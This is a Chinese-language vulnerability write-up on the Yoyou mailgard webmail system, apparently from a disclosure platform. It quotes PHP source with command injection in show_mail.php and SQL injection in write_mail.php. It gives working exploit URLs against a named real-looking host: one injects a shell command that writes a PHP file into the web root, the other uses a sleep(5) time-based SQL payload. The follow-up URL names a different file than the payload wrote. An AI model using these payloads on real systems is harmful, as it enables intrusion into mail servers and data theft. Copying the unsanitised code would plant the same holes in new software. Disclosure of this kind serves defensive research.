佑友mailgard webmail邮件系统sql注射和命令执行(需登录）

摘要

show_mail.php:找到一个用户登录：发送url：访问:sql注射地方:
write_mail.php:跟进去getLinkmanByManid 看看:

show_mail.php:

require_once('../global.php'); //获取参数信息 $t_get_sd = urldecode($_GET['sd']); $_GET['sd'] = strlen($_GET['sd']) > strlen($t_get_sd) ? $t_get_sd : $_GET['sd']; list($box_name,$uid) = explode(':', $_GET['sd']); $box_name = ($box_name); $get_sd = urlencode($box_name). ":" .$uid; if(strpos($_COOKIE['my_referer'],'box_list.php?sd=hicommail_search')!==false){  if(strpos($_COOKIE['my_referer'],'&labelMail=1')!==false){   $label = 'star';   $label2 = 'star2';  }else{   $label = 'search';   $label2 = 'search2';  } } if($_GET['delMove']){  //移动、删除和标记星标动作，会把搜索和星标的id会话记录清空  //防止清空：记录到另一个只在show_mail.php页面使用的会话  if($_SESSION['H_MAILS'][$label]['box:uid']){   $_SESSION['H_MAILS'][$label2]['box:uid'] = $_SESSION['H_MAILS'][$label]['box:uid'];  }    if($_GET['delMove']=='delete' && $box_name=='Trash' || $_GET['delMove']=='shiftdelete'){   select_mailbox($connection,$box_name);   $deleted = mail_flags($connection,'//Deleted','+',$uid);  }else{   if($_GET['delMove']=='delete' && $box_name!='Trash'){    $toBox = 'Trash';   }elseif($_GET['delMove']=='move'){    $toBox = $_GET['toBoxName'];   }   if($gDoveadm ==='0'){    $toBox = mb_convert_encoding($toBox, 'UTF-8', 'UTF7-IMAP');    $boxnm = mb_convert_encoding($box_name, 'UTF-8', 'UTF7-IMAP');    exec("sudo /usr/bin/doveadm move -u ".$gMyAccounts." '".$toBox."' MAILBOX '".$boxnm."' UID ".$uid);

找到一个用户登录：

发送url：

http://mail.iconergy.com:889/src/show_mail.php?sd=aaaa%253A%2520%2526%2520echo%2520%2527%253C%253Fphp%2520phpinfo%2528%2529%253F%253E%2527%2520%253E%2520%252fvar%252fwww%252fnewmail%252fccc.php&delMove=move&toBoxName=yyy

访问:

http://mail.iconergy.com:889/bbb.php

sql注射地方:
write_mail.php:

require_once('../global.php'); $filetime  = time(); $defAllUFSize = $defAllUFId = 0; $defImgsVal  = $defFilesVal = ''; $defUFSUnit  = $defAllUFSize.' B'; $dir = HM_ROOT.$gSubTmpUploadDir; if(!is_dir($dir)){  @mkdir($dir,0722,true);//逐层检查创建0700权限 } if($_GET['manId']){  $to = getLinkmanByManid($_GET['manId']);

跟进去getLinkmanByManid 看看:

/*  * 写邮件 */ function getLinkmanByManid($manId){  global $db,$gMyAccounts;  $linkSql = "SELECT * FROM `linkman` WHERE `man_id` IN ($manId) ORDER BY `sort` ";  $linkResult = $db->query($linkSql);  while ($linkRs=$db->fetch_array ($linkResult)) {   $rs[] = $linkRs['name'] ? '"'.$linkRs['name'].'" <'.$linkRs['mail_addr'].'>' : $linkRs['mail_addr'];  }  if($rs){   $rs = implode(';',$rs);  }else{   $rs = '';  }  return $rs; }

直接请求:

http://mail.iconergy.com:889/src/write_mail.php?manId=sleep(5)

造成延迟 这里构造sql就不多说了